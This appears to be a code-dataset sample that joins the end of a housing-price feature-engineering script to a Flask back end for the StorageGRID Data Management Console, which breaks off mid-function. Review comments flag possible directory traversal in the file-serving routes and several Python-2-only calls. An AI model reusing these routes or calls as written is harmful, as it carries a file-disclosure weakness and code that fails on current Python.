# p[i] = price_rate[year_quarter[i]]
# allDf['price_rate'] = p
# allDf['price_doc'] = allDf.price_doc / allDf.price_rate
# time = np.array([])
# for i in allDf.index:
# time = np.append(time, datetime.strptime(allDf['timestamp'][i], '%Y-%m-%d').timestamp())
# allDf['time'] = time
# allDf.drop('timestamp', 1, inplace=True)
# Pseudo-address: sub_area plus metro distance identifies a building cluster.
allDf['apartment_name'] = allDf.sub_area + allDf['metro_km_avto'].astype(str)
eco_map = {'excellent':4, 'good':3, 'satisfactory':2, 'poor':1, 'no data':0}
allDf['ecology'] = allDf['ecology'].map(eco_map)
#encode subarea in order
# price_by_area = allDf['price_doc'].groupby(allDf.sub_area).mean().sort_values()
# area_dict = {}
# for i in range(0,price_by_area.shape[0]):
# area_dict[price_by_area.index[i]] = i
# allDf['sub_area'] = allDf['sub_area'].map(area_dict)
# Label-encode every remaining string column in place.
for c in allDf.columns:
    if allDf[c].dtype == 'object':
        lbl = preprocessing.LabelEncoder()
        lbl.fit(list(allDf[c].values))
        allDf[c] = lbl.transform(list(allDf[c].values))
# PCA on area feature
# area_feature = []
# for i in allDf.columns:
# if allDf[i].groupby(allDf.sub_area).var().mean()==0 and i != 'sub_area':
# area_feature.append(i)
# areaDf = allDf[area_feature]
# nonareaDf = allDf.drop(area_feature,1)
# areaDf = FeatureCombination(areaDf,'',10)
# allDf = pd.concat([nonareaDf,areaDf],1)
# allDf = FeatureCombination(allDf,'cafe_count',7)
#FeatureCombination(allDf,'sport_count',5)
#FeatureCombination(allDf,'market_count',3)
#FeatureCombination(allDf,'leisure_count',5)
#FeatureCombination(allDf,'church_count',5)
#FeatureCombination(allDf,'big_church_count',5)
#FeatureCombination(allDf,'trc_count',5)
#FeatureCombination(allDf,'office_sqm',5)
#FeatureCombination(allDf,'trc_sqm',3)
#FeatureCombination(allDf,'railroad_station',2)
#FeatureCombination(allDf,'metro',2)
#Transform price to log price
#allDf['log_price'] = np.log1p(allDf.price_doc)
#Drop all training samples with strange price.
#allDf = allDf[~((allDf.price_doc==1000000) & (allDf.product_type_Investment==1))]
#allDf = allDf[~((allDf.price_doc==2000000) & (allDf.product_type_Investment==1))]
#allDf.ix[allDf.price_doc==2000000,'w'] = 0.7
#Undersample strange price
# allDf = sample_vals(allDf, 1000000, 1/8, le)
# allDf = sample_vals(allDf, 2000000, 1/4, eq)
# allDf = sample_vals(allDf, 3000000, 1/2, eq)
#allDf = allDf.reset_index(drop=True)
#allDf.drop('price_doc',1,inplace=True)
###Dealing with Outlier###
# Implausible measurements are replaced with NaN (the downstream model is
# expected to handle missing values); thresholds are hand-tuned constants.
allDf.loc[allDf.full_sq>2000,'full_sq'] = np.nan
allDf.loc[allDf.full_sq<3,'full_sq'] = np.nan
allDf.loc[allDf.life_sq>500,'life_sq'] = np.nan
allDf.loc[allDf.life_sq<3,'life_sq'] = np.nan
# allDf['lifesq_to_fullsq'] = 0 # 0 for normal, 1 for close,2 for outlier
allDf.loc[allDf.life_sq>0.8*allDf.full_sq,'life_sq'] = np.nan
# allDf.ix[allDf.life_sq>allDf.full_sq,['life_sq','lifesq_to_fullsq']] = np.nan, 2
allDf.loc[allDf.kitch_sq>=allDf.life_sq,'kitch_sq'] = np.nan
allDf.loc[allDf.kitch_sq>500,'kitch_sq'] = np.nan
allDf.loc[allDf.kitch_sq<2,'kitch_sq'] = np.nan
allDf.loc[allDf.state>30,'state'] = np.nan
allDf.loc[allDf.build_year<1800,'build_year'] = np.nan
# 20052009 is a known data-entry artifact for 2005.
allDf.loc[allDf.build_year==20052009,'build_year'] = 2005
allDf.loc[allDf.build_year==4965,'build_year'] = np.nan
allDf.loc[allDf.build_year>2021,'build_year'] = np.nan
allDf.loc[allDf.num_room>15,'num_room'] = np.nan
allDf.loc[allDf.num_room==0,'num_room'] = np.nan
allDf.loc[allDf.floor==0,'floor'] = np.nan
allDf.loc[allDf.max_floor==0,'max_floor'] = np.nan
allDf.loc[allDf.floor>allDf.max_floor,'max_floor'] = np.nan
#allDf.ix[allDf.full_sq>300,'full_sq'] = np.nan
#allDf.ix[allDf.life_sq>250,'life_sq'] = np.nan
# brings error down a lot by removing extreme price per sqm
# NaN comparisons evaluate False, so test rows (price_doc is NaN) are kept.
bad_index = allDf[allDf.price_doc/allDf.full_sq > 600000].index
bad_index = bad_index.append(allDf[allDf.price_doc/allDf.full_sq < 10000].index)
allDf.drop(bad_index,0,inplace=True)
####Feature Engineering####
print('Feature Engineering...')
gc.collect()
##Time
# isWeekend = []
# month = []
# year = []
# weekday = []
# week_of_year = []
# year_month = []
# for i in allDf.index:
# dateS = date.fromtimestamp(allDf.time[i]) #timestamp
# isWeekend.append(1 if dateS.isoweekday() == 6 or dateS.isoweekday() == 7 else 0)
# month.append(dateS.month)
# year.append(dateS.year)
# year_month.append(dateS.year*100 + dateS.month)
# weekday.append(dateS.weekday())
# week_of_year.append(dateS.isocalendar()[1])
##allDf['is_weekend'] = pd.Series(isWeekend) #seems to be of no use
# allDf['month'] = np.array(month)
allDf['year'] = allDf.timestamp.dt.year #may be no use because test data is out of range
allDf['weekday'] = allDf.timestamp.dt.weekday
#allDf['week_of_year'] = np.array(week_of_year)
##allDf['year_month'] = np.array(year_month)
#w_map = {2011:0.8, 2012:0.8, 2013:0.9, 2014:1, 2015:1, 2016:0}
#allDf['w'] = [w_map[i] for i in year]
# Assign weight
# Sample weights: down-weight the suspicious flat 1M prices, up-weight the
# most recent (2015) sales.
allDf['w'] = 1
allDf.loc[allDf.price_doc==1000000,'w'] *= 0.5
allDf.loc[allDf.year==2015,'w'] *= 1.5
#May lead to overfitting
#Change timestamp to accumulated days.
#accum_day = np.array([])
#day0 = date(2011,8,20)
#for i in range(0,allDf.shape[0]):
#    accum_day = np.append(accum_day, (date.fromtimestamp(allDf.time[allDf.index[i]]) - day0).days)
#allDf['accum_day'] = pd.Series(accum_day) #try dropping the time column
# Sale count
# mon_to_sale = allDf.groupby('month')['month'].count().to_dict()
# allDf['sale_cnt_mon'] = allDf['month'].map(mon_to_sale)
# week_to_sale = allDf.groupby('week_of_year')['week_of_year'].count().to_dict()
# allDf['sale_cnt_week'] = allDf['week_of_year'].map(week_to_sale)
# allDf = allDf.drop('week_of_year',1)
# allDf = allDf.drop('month',1)
# weekday_to_sale = allDf.groupby('weekday')['weekday'].count().to_dict()
# allDf['sale_cnt_weekday'] = allDf['weekday'].map(weekday_to_sale)
# area_to_sale = allDf.groupby('sub_area')['sub_area'].count().to_dict()
# allDf['sale_cnt_area'] = allDf['sub_area'].map(area_to_sale)
# OKRUGS_to_sale = allDf.groupby('OKRUGS')['OKRUGS'].count().to_dict()
# allDf['sale_cnt_OKRUGS'] = allDf['OKRUGS'].map(OKRUGS_to_sale)
# allDf['year_month'] = (allDf.timestamp.dt.year - 2011) * 12 + allDf.timestamp.dt.month
# year_mon_to_sale = allDf.groupby('year_month')['year_month'].count().to_dict()
# allDf['sale_cnt_year_mon'] = allDf['year_month'].map(year_mon_to_sale)
# allDf.drop('year_month',1,inplace=True)
#Location
#center_OKRUGS_lon = allDf.groupby('OKRUGS')['lon'].mean().to_dict()
#center_OKRUGS_lat = allDf.groupby('OKRUGS')['lat'].mean().to_dict()
#allDf['dist_to_OKRUGS_center'] = np.sqrt((allDf['lon'] - allDf['OKRUGS'].map(center_OKRUGS_lon)) ** 2 +
# (allDf['lat'] - allDf['OKRUGS'].map(center_OKRUGS_lat)) ** 2)
#Floor
allDf['floor_by_max_floor'] = allDf.floor / allDf.max_floor
#allDf['floor_to_top'] = allDf.max_floor - allDf.floor
#Room
allDf['avg_room_size'] = (allDf.life_sq - allDf.kitch_sq) / allDf.num_room
allDf['life_sq_prop'] = allDf.life_sq / allDf.full_sq
allDf['kitch_sq_prop'] = allDf.kitch_sq / allDf.full_sq
#Calculate age of building
# Age relative to the sale year, not to "now".
allDf['build_age'] = allDf.year - allDf.build_year
allDf = allDf.drop('build_year', 1)
#Population
allDf['popu_den'] = allDf.raion_popul / allDf.area_m
allDf['gender_rate'] = allDf.male_f / allDf.female_f
allDf['working_rate'] = allDf.work_all / allDf.full_all
#Education
# Avoid division by zero before computing the preschool demand/supply ratio.
allDf.loc[allDf.preschool_quota==0,'preschool_quota'] = np.nan
allDf['preschool_ratio'] = allDf.children_preschool / allDf.preschool_quota
allDf['school_ratio'] = allDf.children_school / allDf.school_quota
## Group statistics
# avg_yearbuilt_area = allDf.groupby('sub_area')['build_age'].mean().to_dict()
# allDf['avg_yearbuilt_area'] = allDf['sub_area'].map(avg_yearbuilt_area)
# avg_yearbuilt_OKRUGS = allDf.groupby('OKRUGS')['build_age'].mean().to_dict()
# allDf['avg_yearbuilt_OKRUGS'] = allDf['OKRUGS'].map(avg_yearbuilt_OKRUGS)
# Mathematical features
# polyf = ['full_sq','build_age','life_sq','floor','max_floor','num_room']
# for i in range(0,len(polyf)):
# for j in range(i,len(polyf)):
# allDf[polyf[i]+'*'+polyf[j]] = allDf[polyf[i]] * allDf[polyf[j]]
allDf['square_full_sq'] = (allDf.full_sq - allDf.full_sq.mean()) ** 2
allDf['square_build_age'] = (allDf.build_age - allDf.build_age.mean()) ** 2
allDf['nan_count'] = allDf[['full_sq','build_age','life_sq','floor','max_floor','num_room']].isnull().sum(axis=1)
allDf['full*maxfloor'] = allDf.max_floor * allDf.full_sq
allDf['full*floor'] = allDf.floor * allDf.full_sq
allDf['full/age'] = allDf.full_sq / (allDf.build_age + 0.5)
allDf['age*state'] = allDf.build_age * allDf.state
# new trial
# rate_* features: each distance divided by the mean distance of rows sharing
# the same nearest metro/road/railroad ID (relative remoteness within group).
allDf['main_road_diff'] = allDf['big_road2_km'] - allDf['big_road1_km']
allDf['rate_metro_km'] = allDf['metro_km_walk'] / allDf['ID_metro'].map(allDf.metro_km_walk.groupby(allDf.ID_metro).mean().to_dict())
allDf['rate_road1_km'] = allDf['big_road1_km'] / allDf['ID_big_road1'].map(allDf.big_road1_km.groupby(allDf.ID_big_road1).mean().to_dict())
# best on LB with weekday
allDf['rate_road2_km'] = allDf['big_road2_km'] / allDf['ID_big_road2'].map(allDf.big_road2_km.groupby(allDf.ID_big_road2).mean().to_dict())
allDf['rate_railroad_km'] = allDf['railroad_station_walk_km'] / allDf['ID_railroad_station_walk'].map(allDf.railroad_station_walk_km.groupby(allDf.ID_railroad_station_walk).mean().to_dict())
# increase CV from 2.35 to 2.33 but lower LB a little bit (with month)
# allDf['additional_edu_index'] = allDf.additional_education_km / allDf.additional_education_raion
# allDf['rate_edu_km'] = (allDf['additional_education_km']
# / allDf['sub_area'].map(allDf.additional_education_km.groupby(allDf.sub_area).mean().to_dict())) / (allDf.additional_education_raion+0.5)
# allDf['num_house_metro'] = allDf['ID_metro'].map(allDf['full_sq'].groupby(allDf.ID_metro).count().to_dict())
# allDf['num_house_road'] = allDf['ID_big_road1'].map(allDf['full_sq'].groupby(allDf.ID_big_road1).count().to_dict())
# do not improve both CV and LB
# NOTE(review): positional axis arguments to drop() are deprecated in newer
# pandas; this script targets the older API.
allDf.drop(['year','timestamp'], 1, inplace = True)
#Separate train and test again
trainDf = allDf[allDf.isTrain==1].drop(['isTrain'],1)
testDf = allDf[allDf.isTrain==0].drop(['isTrain','price_doc', 'w'],1)
outputFile = 'train_featured.csv'
trainDf.to_csv(outputFile,index=False)
outputFile = 'test_featured.csv'
testDf.to_csv(outputFile,index=False)
# Xgboost handles nan itself
'''
### Dealing with NA ###
#num_room, filled by linear regression of full_sq
if filename == 'train_encoded.csv': #na in num_room only appear in training set
    LR = LinearRegression()
    X = allDf.full_sq[~(np.isnan(allDf.num_room) | np.isnan(allDf.full_sq))].values.reshape(-1, 1)
    y = np.array(allDf.num_room[~(np.isnan(allDf.num_room) | np.isnan(allDf.full_sq))])
    LR.fit(X,y)
    newX = allDf.full_sq[np.isnan(allDf.num_room)].values.reshape(-1, 1)
    newX[np.isnan(newX)] = newX[~np.isnan(newX)].mean() #Special cases (na in full_sq) in test data
    yfit = LR.predict(newX)
    allDf.ix[np.isnan(allDf.num_room),'num_room'] = yfit
#max_floor, twice as the floor
allDf.ix[np.isnan(allDf.max_floor),'max_floor'] = allDf.ix[np.isnan(allDf.max_floor),'floor'] * 2
'''
| StarcoderdataPython |
1764252 | # StorageGRID Data Management Console (DMC)
# Copyright (c) 2018, NetApp, Inc.
# Licensed under the terms of the Modified BSD License (also known as New or Revised or 3-Clause BSD)
import sys
import json
from functools import wraps
from flask import Flask, send_file, render_template, session, request
import botocore, boto3
import logging
import time
import math
import os
from config import *
from utils import *
# static_folder=None disables Flask's built-in static route; /static is served
# by the custom serve_static view below (so files resolve via resource_path).
DMC_APP = Flask(__name__, static_folder=None)
# Random per-process secret key: all sessions are invalidated on restart.
DMC_APP.secret_key = os.urandom(24)
logging.basicConfig(filename='dmc.log', level=logging.INFO, format='[%(asctime)s] %(levelname)s: %(message)s')
# Silence chatty third-party loggers; keep WARNING and above only.
logging.getLogger('botocore').setLevel(logging.WARNING)
logging.getLogger('boto3').setLevel(logging.WARNING)
logging.getLogger('nose').setLevel(logging.WARNING)
logging.getLogger('werkzeug').setLevel(logging.WARNING)
logger = logging.getLogger('dmc')
def get_s3_client():
    """ Function used to create s3 client to make API calls.

    Credentials and endpoint are read from the Flask session, so this must be
    called inside a request context after a successful login.

    :return: tuple of (status dict, client). On success the dict is
        ``{'success': True}``; on failure the client is None and the dict
        carries the error message plus ``not_authenticated`` so the UI can
        redirect to the login page.
    """
    try:
        s3_client = boto3.client(
            's3',
            aws_access_key_id=session['aws_access_key_id'],
            aws_secret_access_key=session['aws_secret_access_key'],
            endpoint_url=session['endpoint_url'],
            verify=session['verify_server_cert'],
            config=botocore.client.Config(user_agent_extra="DMC-SGWS")
        )
        return {'success': True}, s3_client
    except Exception as exception:
        # Fix: use str(exception) instead of exception.message -- .message was
        # deprecated in Python 2.6 and removed in Python 3, where the old code
        # raised AttributeError inside the handler and masked the real error.
        message = str(exception)
        logger.exception('Create s3 client: {}'.format(message))
        return {"success": False, "message": message, "not_authenticated": True}, None
from object_operations import *
from bucket_operations import *
def login_required(f):
    """Decorator that short-circuits requests from unauthenticated sessions.

    :param f: view function to protect
    :return: wrapped view that returns a ``not_authenticated`` JSON payload
        when the session has no ``logged_in`` flag, and calls ``f`` otherwise
    """
    @wraps(f)
    def wrapper(*args, **kwargs):
        if session.get('logged_in'):
            return f(*args, **kwargs)
        return jsonify({"not_authenticated": True})
    return wrapper
@DMC_APP.route('/static/<path:filename>')
def serve_static(filename):
    """ Function used to serve static files in 'static' directory
    :param filename: name of the requested file
    :return: static file
    """
    # NOTE(review): `filename` comes straight from the URL and the <path:>
    # converter allows slashes; unless resource_path() normalizes and rejects
    # '..' segments this is a potential directory-traversal vector -- confirm
    # resource_path's behavior or use flask's safe_join.
    return send_file(resource_path(os.path.join('static', filename)))
@DMC_APP.route('/downloads/<path:filename>')
@login_required
def serve_downloads(filename):
    """ Function used to serve static files in 'downloads' directory
    (login-protected, unlike /static).
    :param filename: name of the requested file
    :return: static file
    """
    # NOTE(review): same traversal concern as serve_static -- `filename` is
    # user-controlled and may contain '..' unless resource_path sanitizes it.
    return send_file(resource_path(os.path.join('downloads', filename)))
@DMC_APP.route("/")
def index():
    """Serve the single-page app shell.

    The RSA public key is embedded so the browser can encrypt the secret key
    before posting it to /login; version/build come from the utils helper.

    :return: rendered index.html
    """
    app_version, app_build = get_version_info()
    return render_template(
        "index.html",
        public_key=public_key,
        version=app_version,
        build=app_build,
    )
@DMC_APP.route('/login', methods=['GET', 'POST'])
def login():
    """ Function used to check login status (GET), or to log in (POST).

    POST expects JSON with ``access_key``, ``secret_key`` (RSA-encrypted,
    base64) and ``rest_endpoint``; credentials are validated by attempting a
    bucket listing and are stored in the session on success.

    :return: dictionary containing success status and response or error message
    """
    if request.method == "GET":
        # NOTE(review): if the session has no 'logged_in' key at all, this
        # branch falls through and the view implicitly returns None, which
        # Flask turns into a 500 -- probably should return a
        # not_authenticated payload here.
        if session.get('logged_in'):
            if session['logged_in']:
                logger.info('Login status: True.')
                return jsonify({'success': True, "name": session["account_name"]})
            else:
                # Defensive: 'logged_in' present but falsy; clear the session.
                logger.info('Login status: False.')
                session.pop('logged_in', None)
                session.clear()
                return jsonify({'success': False, 'message': 'Session expired.', 'not_authenticated': True})
    else:
        json_data = request.json
        logger.debug("Login: request parameters - {}".format(json_data))
        access_key = json_data.get('access_key', '')
        secret_key = json_data.get('secret_key', '')
        rest_endpoint = json_data.get('rest_endpoint', '')
        inputs_to_validate = {
            'access_key': access_key,
            'secret_key': secret_key,
            'rest_endpoint': rest_endpoint
        }
        response = validate_inputs(inputs_to_validate)
        if not response['success']:
            logger.error('Login: {}'.format(response['message']))
            return jsonify(response)
        # The browser RSA-encrypts the secret key with the public key served
        # by index(); decrypt it here. NOTE(review): str.decode('base64') is
        # Python-2-only syntax -- this module cannot run unchanged on
        # Python 3 (use base64.b64decode there).
        secret_key = cipher_rsa.decrypt(secret_key.decode('base64'), 'ERROR')
        # S3 access keys are exactly 20 chars, secret keys exactly 40.
        if not len(access_key) == 20:
            logger.error(DMC_INVALID_ACCESS_KEY)
            return jsonify({'success': False, "message": DMC_INVALID_ACCESS_KEY})
        if not len(secret_key) == 40:
            logger.error(DMC_INVALID_SECRET_KEY)
            return jsonify({'success': False, "message": DMC_INVALID_SECRET_KEY})
        # Endpoint must look like http(s)://hostname[:port].
        hostname_regex = re.compile(
            '^https?://(([a-zA-Z0-9]|[a-zA-Z0-9][a-zA-Z0-9\-]*[a-zA-Z0-9])\.)'
            '*([A-Za-z0-9]|[A-Za-z0-9][A-Za-z0-9\-]*[A-Za-z0-9])(:[0-9]{2,5})?$')
        if not hostname_regex.match(rest_endpoint):
            logger.error(DMC_INVALID_REST_ENDPOINT)
            return jsonify({'success': False, "message": DMC_INVALID_REST_ENDPOINT})
        # Stash credentials in the session so get_s3_client() can use them,
        # then verify them by listing buckets.
        session['aws_access_key_id'] = access_key
        session['aws_secret_access_key'] = secret_key
        session['endpoint_url'] = rest_endpoint
        session['verify_server_cert'] = json_data.get('verify_cert', True)
        buckets_list = get_buckets()
        if buckets_list['success']:
            logger.info('Logged in successfully.')
            session['logged_in'] = True
            buckets_list = convert_date_to_strings(buckets_list)
            session["account_name"] = buckets_list['response']['Owner']['DisplayName']
            # Initialize per-session pagination/browsing state.
            session["pagination_markers"] = []
            session["current_bucket"] = ""
            session["page"] = 1
        else:
            logger.info('Login failed.')
        return jsonify(buckets_list)
@DMC_APP.route('/logout', methods=["GET"])
def logout():
    """Clear all per-user session state and confirm the logout.

    :return: JSON dictionary containing success status
    """
    result = {'success': True}
    session.pop('logged_in', None)
    session.clear()
    logger.info('Logged out successfully.')
    return jsonify(result)
@DMC_APP.route("/bucket", methods=["GET", "POST"])
@login_required
def bucket_methods():
    """ List all buckets (GET) or create a new bucket (POST).
    :return: dictionary containing success status and response or error message
    """
    if request.method == "POST":
        return jsonify(create_bucket(request))
    # Any non-POST request here is a GET (only two methods are routed).
    return jsonify(get_buckets())
@DMC_APP.route("/bucket/<bucket_name>", methods=["DELETE"])
@login_required
def delete_bucket(bucket_name):
    """ Delete a bucket, emptying it of all objects first.
    :param bucket_name: bucket name
    :return: dictionary containing success status and response or error message
    """
    logger.debug("Delete Bucket: request parameters - {}".format(bucket_name))
    validation = validate_inputs({'bucket_name': bucket_name})
    if not validation['success']:
        logger.error('Delete bucket: {}'.format(validation['message']))
        return jsonify(validation)
    client_status, s3_client = get_s3_client()
    if not client_status['success']:
        return jsonify(client_status)
    # A bucket must be empty before it can be deleted.
    emptied = delete_objects_helper(bucket_name=bucket_name, client=s3_client)
    if not emptied['success']:
        return jsonify(emptied)
    outcome = s3_bucket_operations('delete_bucket', s3_client,
                                   {'bucket_name': bucket_name})
    if outcome['success']:
        # Forget the bucket so stale pagination state is not reused.
        session["current_bucket"] = ""
    return jsonify(outcome)
@DMC_APP.route("/delete_objects", methods=["POST"])
@login_required
def delete_objects():
    """ Delete the requested file- and folder-like objects from a bucket.
    :return: dictionary containing success status and response or error message
    """
    client_status, s3_client = get_s3_client()
    if not client_status['success']:
        return jsonify(client_status)
    logger.debug("Delete Objects: request parameters - {}".format(request.json))
    bucket_name = request.json.get('bucket')
    objects = request.json.get('items')
    validation = validate_inputs({
        'bucket': bucket_name,
        'items': objects
    })
    if not validation['success']:
        logger.error('Delete objects: {}'.format(validation['message']))
        return jsonify(validation)
    # Partition the request into plain files and folder prefixes.
    to_del_obj_list = [dict(Key=item['key']) for item in objects
                       if item['type'] == 'file']
    prefix_list = [item['key'] for item in objects if item['type'] != 'file']
    logger.debug("Delete Objects: files like objects - {}".format(to_del_obj_list))
    if to_del_obj_list:
        chunk_result = delete_objects_by_chunks(s3_client, to_del_obj_list, bucket_name)
        if not chunk_result['success']:
            return jsonify(chunk_result)
    logger.debug("Delete Objects: folder like objects - {}".format(prefix_list))
    # Folder-like objects are deleted recursively, one prefix at a time.
    for prefix in prefix_list:
        helper_result = delete_objects_helper(bucket_name=bucket_name,
                                              prefix=prefix, client=s3_client)
        if not helper_result['success']:
            return jsonify(helper_result)
    return jsonify({'success': True, 'response': {}})
@DMC_APP.route("/list_objects", methods=["GET"])
@login_required
def list_objects():
    """ Function used to get list of objects.

    Lists one "page" of objects under a bucket/prefix, maintaining a stack of
    S3 continuation markers in the Flask session so the UI can page
    first/previous/current/next.
    :return: dictionary containing success status and response or error message
    """
    response, s3_client = get_s3_client()
    if not response['success']:
        return jsonify(response)
    logger.debug("List Objects: request parameters - {}".format(request.args))
    bucket_name = request.args.get('bucketName')
    page_size = request.args.get('page_size')
    max_keys = request.args.get('marker_size')
    inputs_to_validate = {
        'bucketName': bucket_name,
        'page_size': page_size,
        'marker_size': max_keys
    }
    response = validate_inputs(inputs_to_validate)
    if not response['success']:
        logger.error('List objects: {}'.format(response['message']))
        return jsonify(response)
    # path_index selects which breadcrumb level's marker stack to use.
    breadcrumb_index = request.args.get('path_index', 0)
    int_inputs_to_validate = {
        'page_size': page_size,
        'marker_size': max_keys,
        'path_index': breadcrumb_index
    }
    response = validate_int_inputs(int_inputs_to_validate)
    if not response['success']:
        logger.error('List objects: {}'.format(response['message']))
        return jsonify(response)
    page_size = int(page_size)
    max_keys = int(max_keys)
    breadcrumb_index = int(breadcrumb_index)
    # marker is a navigation verb: "", "first", "current", "next" or "previous".
    marker = request.args.get('marker', "")
    requested_marker = ""
    prefix = request.args.get('prefix', '')
    # Reset all pagination state when the user switches bucket or asks for a refresh.
    if session["current_bucket"] == "" or session["current_bucket"] != bucket_name \
            or request.args.get('refresh_markers'):
        session["current_bucket"] = bucket_name
        session["pagination_markers"] = [{"key": bucket_name, "markers": [""]}]
    # Drop marker stacks for breadcrumb levels deeper than the one requested.
    session["pagination_markers"] = session["pagination_markers"][:(breadcrumb_index + 1)]
    if prefix:
        # NOTE(review): len(filter(...)) only works on Python 2, where filter
        # returns a list — this file appears to target Python 2.
        if not len(filter(lambda x: x['key'] == prefix, session["pagination_markers"])) == 1:
            session["pagination_markers"].append(
                {"key": prefix, "markers": [""]}
            )
    markers = session["pagination_markers"][breadcrumb_index]["markers"]
    logger.debug("List Objects: markers before request - {}".format(markers))
    response = {}
    try:
        # Translate the navigation verb into the S3 marker to start listing from.
        if marker == "first":
            markers = [""]
        elif marker == "current":
            markers.pop()
            requested_marker = markers[-1]
        elif marker == "next":
            # presumably a boolean marker means "no more pages" — TODO confirm
            # against get_objects' contract.
            if not isinstance(markers[-1], bool):
                requested_marker = markers[-1]
            else:
                requested_marker = markers[-2]
        elif marker == "previous":
            # Pop the current page's marker (and the one before it) so the
            # listing restarts from the previous page's start marker.
            if len(markers) == 2:
                markers = markers[:-1]
            elif len(markers) > 2:
                markers = markers[:-2]
            requested_marker = markers[-1]
        response = get_objects(s3_client, bucket_name, prefix, requested_marker, max_keys)
        if not response['success']:
            return jsonify(response)
        else:
            data = response['data']
            # page_offset converts marker-stack depth into a UI page offset.
            data["page_offset"] = math.ceil((float(len(markers) - 1) * max_keys) / page_size)
            data["page"] = len(markers)
            markers.append(response['marker'])
            logger.debug("List Objects: markers after request - {}".format(markers))
            session["pagination_markers"][breadcrumb_index]["markers"] = markers
            return jsonify({"success": True, "response": data})
    except Exception as exception:
        # NOTE(review): exception.message is Python-2-only.
        response.update({"success": False, "message": exception.message})
        logger.exception('List objects: {}'.format(exception.message))
        return jsonify(response)
@DMC_APP.route("/object", methods=["GET", "POST"])
@login_required
def object_methods():
    """ Function used to create folder like object or get metadata of the object or cut/copy paste of objects.

    POST dispatches on the JSON 'action' field ('create_folder' or
    'cut_copy_objects'); GET returns head-object metadata for a single key.
    :return: dictionary containing success status and response or error message
    """
    response, s3_client = get_s3_client()
    if not response['success']:
        return jsonify(response)
    if request.method == 'POST':
        action = request.json.get('action')
        bucket_name = request.json.get('bucketName')
        inputs_to_validate = {
            'action': action
        }
        response = validate_inputs(inputs_to_validate)
        if not response['success']:
            logger.error('Create folder: {}'.format(response['message']))
            return jsonify(response)
        if action == 'create_folder':
            logger.debug("Create Folder: request parameters - {}".format(request.json))
            name = request.json.get('name')
            inputs_to_validate = {
                'action': action,
                'bucketName': bucket_name,
                'name': name
            }
            response = validate_inputs(inputs_to_validate)
            if not response['success']:
                logger.error('Create folder: {}'.format(response['message']))
                return jsonify(response)
            key_prefix = request.json.get('prefix')
            # Folder-like objects are keys ending in '/'.
            if name != '/':
                name = name + '/'
            if key_prefix:
                name = "{}{}".format(key_prefix, name)
            response = check_key_existence(s3_client, bucket_name, name)
            # check_key_existence succeeding means the key already exists.
            if not response['success']:
                params = {
                    'bucket_name': bucket_name,
                    'body': '',
                    'key': name
                }
                response = s3_object_operations('create_folder', s3_client, params)
                return jsonify(response)
            else:
                message = "Folder with the same name already exists. Please provide different name."
                logger.error('Create folder: {}'.format(message))
                return jsonify({"success": False, "message": message})
        elif action == 'cut_copy_objects':
            logger.debug("Paste Objects: request parameters - {}".format(request.json))
            requested_objects = request.json.get('objects')
            operation = request.json.get('operation')
            overwrite = request.json.get('overwrite')
            inputs_to_validate = {
                'action': action,
                'objects': requested_objects,
                'bucketName': bucket_name,
                'operation': operation,
                'overwrite': overwrite
            }
            response = validate_inputs(inputs_to_validate)
            if not response['success']:
                logger.error('{} objects(s): {}'.format(operation.capitalize(), response['message']))
                return jsonify(response)
            key_prefix = request.json.get('prefix')
            for obj in requested_objects:
                # Destination key = destination prefix + original key name.
                name = "{}{}".format(key_prefix, obj['key']) if key_prefix else obj['key']
                response = copy_objects(s3_client, obj['bucket'], bucket_name, obj['fullkey'],
                                        name, obj['type'], overwrite)
                if not response['success']:
                    return jsonify(response)
                # Keys the copy skipped (e.g. not overwritten) must not be deleted.
                skip_keys = response['skipped_keys']
                if operation == 'cut':
                    # 'cut' = copy then delete the source object(s).
                    if obj['type'] == 'file' and obj['fullkey'] not in skip_keys:
                        response = delete_objects_by_chunks(s3_client, [{'Key': obj['fullkey']}], obj['bucket'])
                    else:
                        response = delete_objects_helper(bucket_name=obj['bucket'], prefix=obj['fullkey'],
                                                         client=s3_client, skip_keys=skip_keys)
                    if not response['success']:
                        return jsonify(response)
            logger.info('{} objects(s) successfully completed.'.format(operation.capitalize()))
            return jsonify({'success': True})
    else:
        # GET: return head-object metadata for a single key.
        logger.debug("Get Metadata: request parameters - {}".format(request.args))
        bucket_name = request.args.get('bucket')
        key = request.args.get('name')
        inputs_to_validate = {
            'bucket': bucket_name,
            'name': key
        }
        response = validate_inputs(inputs_to_validate)
        if not response['success']:
            logger.error('Head object: {}'.format(response['message']))
            return jsonify(response)
        params = {
            'bucket_name': bucket_name,
            'key': key
        }
        response = s3_object_operations('head_object', s3_client, params)
        return jsonify(response)
@DMC_APP.route("/upload_file", methods=["POST"])
@login_required
def upload_file():
    """ Upload a single file into a bucket, refusing to overwrite an existing key.
    :return: dictionary containing success status and response or error message
    """
    client_status, s3_client = get_s3_client()
    if not client_status['success']:
        return jsonify(client_status)
    logger.debug("Upload File: request parameters - {}".format(request.form))
    filename = request.form.get('filename')
    bucket_name = request.form.get('bucketName')
    file_to_upload = request.files.get('file')
    validation = validate_inputs({
        'filename': filename,
        'bucketName': bucket_name,
        'file': file_to_upload
    })
    if not validation['success']:
        logger.error('Upload file: {}'.format(validation['message']))
        return jsonify(validation)
    prefix = request.form.get('prefix')
    if prefix:
        filename = "{}{}".format(prefix, filename)
    # check_key_existence succeeding means the key is already taken.
    existence = check_key_existence(s3_client, bucket_name, filename)
    if existence['success']:
        message = "File with the same name already exists."
        logger.error('Upload file: {}'.format(message))
        return jsonify({"success": False, "message": message})
    upload_result = s3_object_operations('upload_fileobj', s3_client, {
        'bucket_name': bucket_name,
        'file': file_to_upload,
        'key': filename
    })
    return jsonify(upload_result)
@DMC_APP.route("/create_multipart_upload", methods=["GET"])
@login_required
def create_multipart_upload():
    """ Initiate a multipart upload, refusing to overwrite an existing key.
    :return: dictionary containing success status and response or error message
    """
    client_status, s3_client = get_s3_client()
    if not client_status['success']:
        return jsonify(client_status)
    logger.debug("Create Multipart Upload: request parameters - {}".format(request.args))
    filename = request.args.get('filename')
    bucket_name = request.args.get('bucketName')
    validation = validate_inputs({
        'filename': filename,
        'bucketName': bucket_name
    })
    if not validation['success']:
        logger.error('Create multipart upload: {}'.format(validation['message']))
        return jsonify(validation)
    prefix = request.args.get('prefix')
    if prefix:
        filename = "{}{}".format(prefix, filename)
    # check_key_existence succeeding means the key is already taken.
    existence = check_key_existence(s3_client, bucket_name, filename)
    if existence['success']:
        message = "File with the same name already exists."
        logger.error('Create multipart upload: {}'.format(message))
        return jsonify({"success": False, "message": message})
    initiation = s3_object_operations('create_multipart_upload', s3_client, {
        'bucket_name': bucket_name,
        'key': filename
    })
